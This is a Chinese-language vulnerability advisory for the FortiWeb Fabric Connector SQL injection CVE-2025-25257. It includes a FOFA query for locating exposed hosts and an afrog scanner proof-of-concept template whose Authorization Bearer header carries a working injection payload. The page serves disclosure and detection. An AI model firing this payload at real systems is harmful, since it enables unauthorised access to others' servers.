Fortinet FortiWeb SQL注入漏洞

漏洞信息

漏洞名称: Fortinet FortiWeb SQL注入漏洞

漏洞编号:

  • CVE: CVE-2025-25257

漏洞类型: SQL注入

漏洞等级: 严重

漏洞描述: Fortinet FortiWeb是一款广泛使用的Web应用防火墙(WAF),旨在保护Web应用免受各种攻击,如SQL注入、跨站脚本(XSS)等。FortiWeb Fabric Connector是其组件之一,用于集成和管理设备状态。该组件在企业级部署中常见,尤其是在需要高安全性Web应用保护的场景中。

该漏洞源于FortiWeb Fabric Connector组件在处理认证请求时,未能严格校验Authorization: Bearer头中的输入参数。攻击者可以构造恶意的SQL语句,注入到该头中,从而绕过认证机制,实现远程代码执行(RCE),最终获取服务器权限。这种漏洞的根源在于输入验证不足,使得攻击者能够利用SQL注入技术直接与后端数据库交互。

由于该漏洞允许远程代码执行,攻击者可以在无需认证的情况下,完全控制受影响的服务器。这意味着攻击者可以窃取敏感数据、篡改网站内容、甚至利用服务器作为跳板发起进一步攻击。鉴于FortiWeb的广泛使用,该漏洞的影响范围可能非常广泛,尤其是那些未及时应用补丁的系统。此外,由于漏洞利用相对简单,自动化攻击的风险较高,因此需要立即采取缓解措施。

产品厂商: Fortinet

产品名称: FortiWeb Fabric Connector

搜索语法: title=”fortiweb - “

来源: https://github.com/zan8in/afrog/blob/2f6722015a76956b8f84dd0c2780c67e9e933ae9/pocs%2Ftemp%2Fafrog-pocs%2Fcve%2FCVE-2025-25257.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

id: CVE-2025-25257

info:
name: Fortinet FortiWeb SQL注入漏洞
author: avic123
severity: critical
verified: true
description: |
该漏洞源于Fortinet FortiWeb Fabric Connector 组件在认证处理中没有严格校验输入参数,攻击者可在 Authorization: Bearer 头中注入恶意SQL语句,实现远程代码执行获取服务器权限
fofa:fofa:title="fortiweb - "
reference:
- https://mp.weixin.qq.com/s/uX7DFLxlxOdVl0Yc-VHUWg
tags: Fortinet,CVE,CVE-2025-25257,sqli
created: 2025/07/14

set:
hostname: request.url.host

rules:
r0:
request:
method: GET
path: /api/fabric/device/status
headers:
Authorization: Bearer 'and('x'='x')union(select(@@global.secure_file_priv));--+-
expression: >-
response.status == 401
extractors:
- type: word
extractor:
tips: "需要进行人工核查 (Manual verification is required)"
expression: r0()



Fortinet FortiWeb SQL注入漏洞
http://example.com/2025/07/17/github_1654517430/
作者
lianccc
发布于
2025年7月17日
许可协议